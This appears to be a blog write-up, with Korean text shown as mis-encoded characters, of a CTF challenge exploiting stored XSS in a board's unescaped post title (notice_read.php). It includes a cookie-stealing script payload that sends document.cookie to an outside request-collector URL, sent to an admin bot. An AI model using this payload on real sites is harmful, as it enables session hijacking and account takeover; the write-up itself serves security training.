[CTF] XSS1

CHIKAยท2024๋…„ 6์›” 26์ผ
post-thumbnail

๐Ÿ“Œ
XSS (Cross Site Scripting)
Cookie ํƒˆ์ทจ


์ทจ์•ฝ์  ์„ค๋ช… : Stored XSS
์ทจ์•ฝ์  ๋ฐœ์ƒ ์œ„์น˜ : notice_read.php


ํšŒ์›๊ฐ€์ž… ํ›„ ๋กœ๊ทธ์ธ

๊ฒŒ์‹œํŒ์ด ์žˆ์œผ๋‹ˆ ๊ธ€๋ถ€ํ„ฐ ์จ๋ดค์Šต๋‹ˆ๋‹ค.

ํŠน์ˆ˜๋ฌธ์ž ์‚ฝ์ž…์ด ๊ฐ€๋Šฅํ•œ์ง€ ํ™•์ธํ•˜๊ธฐ ์œ„ํ•ด ์ œ๋ชฉ,๋‚ด์šฉ์— ๋ชจ๋‘ test<'">๋ฅผ ๋„ฃ์–ด๋ด„.

์ž‘์„ฑํ•œ ๊ฒŒ์‹œ๊ธ€ ํด๋ฆญํ•ด์„œ๋ณด๋‹ˆ

contents์™€ ๋‹ฌ๋ฆฌ title์€ Html Entity ์น˜ํ™˜์ด ์•ˆ๋œ ๊ฒƒ์„ ํ™•์ธํ•จ.

๊บฝ์‡ ๋ฅผ ๋„ฃ์„ ์ˆ˜ ์žˆ์œผ๋‹ˆ ์Šคํฌ๋ฆฝํŠธ๋ฅผ ๋„ฃ์–ด๋ด„.
์ž‘๋™์—ฌ๋ถ€ ํ™•์ธ๋ถ€ํ„ฐ ํ•˜๊ธฐ์œ„ํ•ด <script>alert(1)</script>์„ ์‚ฝ์ž….

์ž‘์„ฑํ•œ ๊ฒŒ์‹œ๋ฌผ ํด๋ฆญํ•˜๋ฉด ์ž˜ ์ž‘๋™ํ•˜๋Š” ๊ฒƒ์„ ํ™•์ธ!

์Šคํฌ๋ฆฝํŠธ๊ฐ€ ์ž˜ ์ž‘๋™ํ•˜๋‹ˆ ์ฟ ํ‚คํƒˆ์ทจ์ฝ”๋“œ๋ฅผ ๋„ฃ๊ณ  ๊ฒŒ์‹œ๋ฌผ์„ ํด๋ฆญํ•ด๋ด„.

<script>var cookieData = document.cookie;var i =new Image();i.src = "https://en2hyoic3j7mi.x.pipedream.net/?cookie=" + cookieData;</script>

๊ณต๊ฒฉ์ž ์„œ๋ฒ„๋กœ ์ฟ ํ‚ค๊ฐ’์ด ์ œ๋Œ€๋กœ ๋„˜์–ด์˜ค๊ณ  ์žˆ๋‹ค!

์ฟ ํ‚ค๊ฐ’์ด ๋‚˜์˜ค์ง€ ์•Š๋Š”๋‹ค๋ฉด alert(document.cookie)๋ฅผ ์ฐ์–ด๋ณด๊ณ  ๋นˆ ์ฐฝ์ด ์ถœ๋ ฅ๋˜๋ฉด
https://velog.io/@dmkr9845/document.cookie-%EC%95%88%EB%90%A8
๊ธ€์„ ์ฐธ๊ณ ํ•˜์ž.

๊ด€๋ฆฌ์žBot์—๊ฒŒ ํ•ด๋‹น ํŽ˜์ด์ง€ URL์„ ๋ณด๋‚ด์„œ ์ฟ ํ‚ค๊ฐ’์ด ๋„˜์–ด์˜ค๋ฉด ์„ฑ๊ณต!

0๊ฐœ์˜ ๋Œ“๊ธ€